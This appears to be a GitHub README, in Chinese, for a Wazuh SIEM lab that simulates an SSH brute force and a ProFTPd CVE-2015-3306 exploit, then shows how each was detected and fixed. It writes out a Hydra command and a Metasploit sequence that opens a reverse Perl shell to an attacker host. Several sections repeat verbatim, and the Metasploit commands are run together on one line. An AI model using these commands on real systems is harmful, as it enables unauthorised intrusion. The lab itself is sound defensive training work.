Redflame-Irido/Wazuh-Siem-Threat-Hunting
GitHub: Redflame-Irido/Wazuh-Siem-Threat-Hunting
基于 Wazuh 构建的企业级 SIEM 威胁狩猎实验室,通过模拟暴力破解与远程代码执行攻击,完整展示检测、分析和修复的防御闭环。
Stars: 0 | Forks: 0
# Wazuh-Siem-Threat-Hunting
部署 Wazuh SIEM 实例以检测、分析和缓解活跃的暴力破解攻击。
# 企业级 SIEM 部署、对手模拟与威胁修复实验室
一个全面的网络防御与攻击实操沙箱,旨在模拟高级持续性威胁(APT)生命周期,使用企业级 SIEM 引擎监控取证遥测数据,并执行主动防御对策。
## 实验室架构与网络拓扑
为确保完全安全并遏制恶意 payload 流量,整个基础设施部署在一个隔离的 VirtualBox 环境中,利用了一个封闭的、自定义的 NAT 网络段。
* **SIEM Manager:** 集中式 Wazuh Server 部署,充当日志聚合器、持续的文件完整性监控器和告警索引管理器。
* **攻击者:** 预装了战术侦察和漏洞利用软件套件的 Kali Linux 实例。
* **目标:** 运行故意未打补丁的旧版 Ubuntu 14.04 Trusty Tahr 的 Metasploitable 3 实例。
## 阶段 1:凭据暴力破解攻击与检测流水线
此阶段评估了 SIEM 平台针对高速、自动化身份认证猜测攻击的可见性。
### 1. 攻击向量(对手视角)
使用 Hydra 对目标的 SSH 子系统(端口 22)发起了字典攻击,尝试使用 rockyou.txt 字典破解 vagrant 服务账户:
hydra -l vagrant -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.15 -t 4 -V
### 2. 检测引擎(SOC 分析师视角)
自动化的网络入侵尝试立即在 Wazuh 安全索引器中触发了急剧的纵向统计告警峰值。
#### 提取的失陷指标
* **Rule ID:** 5758(自动映射为“Maximum authentication attempts exceeded”)
* **Rule Level:** 8(由于快速违反阈值而自动升级为中高危)
* **目标账户:** data.dstuser: vagrant
* **MITRE ATT&CK 映射:** T1110 — Brute Force
* **网络向量:** 通过 data.srcip 捕获恶意 IP 地址
### 3. 防御性修复与加固
为了永久消除攻击面,在受害节点上直接集成了 Fail2Ban,以便在突破阈值时自动在防火墙层丢弃恶意流量:
sudo apt-get install fail2ban
sudo service fail2ban start
**验证结果:** 从 Kali 重新运行相同的 Hydra 攻击配置文件后,返回了完全的连接断开,证明了成功的主动网络缓解。
## 阶段 2:远程代码执行(RCE)漏洞利用
为了模拟更深层次的企业入侵场景,攻击从烦人的暴力破解升级为通过遗留服务缺陷进行的未经身份验证的系统接管。
### 1. 攻击向量(对手视角)
受害 endpoint 被映射为运行着未打补丁的文件传输模块:ProFTPd v1.3.5,该模块包含严重的数据复制设计缺陷(CVE-2015-3306)。这允许未经身份验证的远程攻击者读取/写入任意服务器文件。
漏洞利用参数在 Metasploit Framework 内被武装配置:
msfconsoleuse exploit/unix/ftp/proftpd_modcopy_execset PAYLOAD cmd/unix/reverse_perlset RHOSTS 10.0.2.15set LHOST 10.0.2.3set SITEPATH /var/www/htmlexploit
**影响:** 该模块迫使服务将内部逻辑路径复制到可访问的 Web 根目录中,在无需输入任何用户密码的情况下触发了未经身份验证的交互式反向 Web shell 会话。
### 2. 检测引擎(SOC 分析师视角)
Wazuh 的主动关联引擎立即隔离了 Web 目录篡改和随后的反向 shell 部署:
* **Web 篡改标记:** Rule ID 31103 / 31106 捕获了对 Web 目录结构进行输入更改的可疑执行字符串模式。
* **进程行为异常:** 主机级完整性监控框架捕获到一个内部 shell 进程直接从活跃的 Web 服务器后台任务 中派生,升级为级别 7 的严重性警告标记。
### 3. 防御性修复与打补丁
为了彻底根除 RCE 向量,修改了应用程序的配置架构以锁定模块缺陷:
1. 通过终端编辑器手动打开 `/etc/proftpd/proftpd.conf`。
2. 通过注释掉/限制 `mod_copy` 来禁用易受攻击的执行复制模块。
3. 重启后台 daemon 服务布局:
sudo service proftpd restart
**验证结果:** 重新运行 Metasploit 武器化模块后返回了明确的连接断开错误:“Exploit failed: Connection Refused”,验证了完全加固的基线。
## 展示的核心能力
* **Blue Team 与 SIEM 工程:** 部署和配置分布式日志代理,优化分析规则集,并调查威胁遥测索引。
* **Red Team 对手模拟:** 实际执行自动化映射工具 (Nmap)、暴力破解系统 (Hydra) 和漏洞利用编排平台。
* **事件响应与系统补丁:** 实施自动化的网络隔离防线,编辑关键的 daemon 配置,并分析 MITRE TTP 指标。
### 3. 防御性修复与加固
为了永久消除攻击面,在受害节点上直接集成了 Fail2Ban,以便在突破阈值时自动在防火墙层丢弃恶意流量:
sudo apt-get install fail2ban
sudo service fail2ban start
**验证结果:** 从 Kali 重新运行相同的 Hydra 攻击配置文件后,返回了完全的连接断开,证明了成功的主动网络缓解。
## 阶段 2:远程代码执行(RCE)漏洞利用
为了模拟更深层次的企业入侵场景,攻击从烦人的暴力破解升级为通过遗留服务缺陷进行的未经身份验证的系统接管。
### 1. 攻击向量(对手视角)
受害 endpoint 被映射为运行着未打补丁的文件传输模块:ProFTPd v1.3.5,该模块包含严重的数据复制设计缺陷(CVE-2015-3306)。这允许未经身份验证的远程攻击者读取/写入任意服务器文件。
漏洞利用参数在 Metasploit Framework 内被武装配置:
msfconsoleuse exploit/unix/ftp/proftpd_modcopy_execset PAYLOAD cmd/unix/reverse_perlset RHOSTS 10.0.2.15set LHOST 10.0.2.3set SITEPATH /var/www/htmlexploit
**影响:** 该模块迫使服务将内部逻辑路径复制到可访问的 Web 根目录中,在无需输入任何用户密码的情况下触发了未经身份验证的交互式反向 Web shell 会话。
### 2. 检测引擎(SOC 分析师视角)
Wazuh 的主动关联引擎立即隔离了 Web 目录篡改和随后的反向 shell 部署:
* **Web 篡改标记:** Rule ID 31103 / 31106 捕获了对 Web 目录结构进行输入更改的可疑执行字符串模式。
* **进程行为异常:** 主机级完整性监控框架捕获到一个内部 shell 进程直接从活跃的 Web 服务器后台任务 中派生,升级为级别 7 的严重性警告标记。
### 3. 防御性修复与打补丁
为了彻底根除 RCE 向量,修改了应用程序的配置架构以锁定模块缺陷:
1. 通过终端编辑器手动打开 `/etc/proftpd/proftpd.conf`。
2. 通过注释掉/限制 `mod_copy` 来禁用易受攻击的执行复制模块。
3. 重启后台 daemon 服务布局:
sudo service proftpd restart
**验证结果:** 重新运行 Metasploit 武器化模块后返回了明确的连接断开错误:“Exploit failed: Connection Refused”,验证了完全加固的基线。
## 展示的核心能力
* **Blue Team 与 SIEM 工程:** 部署和配置分布式日志代理,优化分析规则集,并调查威胁遥测索引。
* **Red Team 对手模拟:** 实际执行自动化映射工具 (Nmap)、暴力破解系统 (Hydra) 和漏洞利用编排平台。
* **事件响应与系统补丁:** 实施自动化的网络隔离防线,编辑关键的 daemon 配置,并分析 MITRE TTP 指标。标签:CTI, Wazuh, x64dbg, 免杀技术, 安全实验环境, 安全运营, 扫描框架, 暴力破解检测